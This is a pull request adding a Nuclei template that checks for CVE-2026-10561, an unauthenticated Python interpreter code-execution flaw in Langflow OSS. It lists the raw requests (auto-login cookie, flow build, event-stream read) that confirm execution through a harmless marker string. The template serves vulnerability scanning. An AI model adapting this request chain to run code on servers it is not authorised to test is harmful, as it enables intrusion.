### PR TITLE
Add CVE-2026-10561 Langflow OSS Python interpreter RCE

### DIFF
--- a/http/cves/2026/CVE-2026-10561.yaml
+++ b/http/cves/2026/CVE-2026-10561.yaml
@@ -1,0 +1,65 @@
+id: CVE-2026-10561
+
+info:
+  name: Langflow OSS 1.0.0-1.9.3 - Unauthenticated Python Interpreter RCE
+  author: str4k3r
+  severity: critical
+  description: |
+    Langflow OSS versions through 1.9.3 expose the Python Interpreter
+    component with an unrestricted Python builtins dictionary. The default
+    auto-login endpoint supplies the cookie needed to invoke a pre-existing
+    flow containing that component. This probe builds the supplied flow and
+    checks the in-band result of a harmless marker-file write inside the
+    target container. Set flow_id to a flow containing the PythonREPLComponent
+    node named PythonREPLComponent-nuclei, configured with python_code that writes and prints CVE10561_NUCLEI_MARKER
+    to /tmp/cve10561-nuclei-oracle; the fixed 1.10.0 component rejects open().
+  reference:
+    - https://www.ibm.com/support/pages/node/7277242
+    - https://nvd.nist.gov/vuln/detail/CVE-2026-10561
+    - https://github.com/langflow-ai/langflow/compare/v1.9.3...v1.10.0
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
+    cvss-score: 10.0
+    cve-id: CVE-2026-10561
+    cwe-id: CWE-94
+  metadata:
+    verified: true
+    max-request: 3
+    product: langflow
+    vendor: langflowai
+  tags: cve,cve2026,langflow,rce,python,auth-bypass
+
+variables:
+  flow_id: ""
+
+http:
+  - raw:
+      - |-
+        GET /api/v1/auto_login HTTP/1.1
+        Host: {{Hostname}}
+
+      - |-
+        POST /api/v1/build/{{flow_id}}/flow?start_component_id=PythonREPLComponent-nuclei&event_delivery=streaming HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/json
+
+        {}
+
+      - |-
+        GET /api/v1/build/{{job_id}}/events?event_delivery=streaming HTTP/1.1
+        Host: {{Hostname}}
+
+    cookie-reuse: true
+    extractors:
+      - type: json
+        name: job_id
+        part: body
+        json:
+          - ".job_id"
+        internal: true
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - CVE10561_NUCLEI_MARKER


### PR DESCRIPTION
## Vulnerability
Langflow OSS through 1.9.3 exposes the Python Interpreter component with unrestricted builtins. A flow containing that component can execute arbitrary Python on the server; the 1.10.0 fix restricts the dangerous operation.

## Template behavior
The template obtains the auto-login cookie, builds the supplied flow, follows the build event stream, and matches the marker printed by the Python component. This proves code execution through the vulnerable component rather than only an exposed endpoint.

## Required configuration
Provide a pre-existing accessible flow containing a PythonREPLComponent node named `PythonREPLComponent-nuclei` and set `flow_id` to that flow UUID. The flow should print `CVE10561_NUCLEI_MARKER` as described in the template.

## Impact
Remote code execution with the privileges of the Langflow service.

## Usage
```bash
nuclei -u <authorized-target> -t http/cves/2026/CVE-2026-10561.yaml -var flow_id=<flow-uuid>
```

Run this template only against systems and test accounts you own or are explicitly authorized to assess.
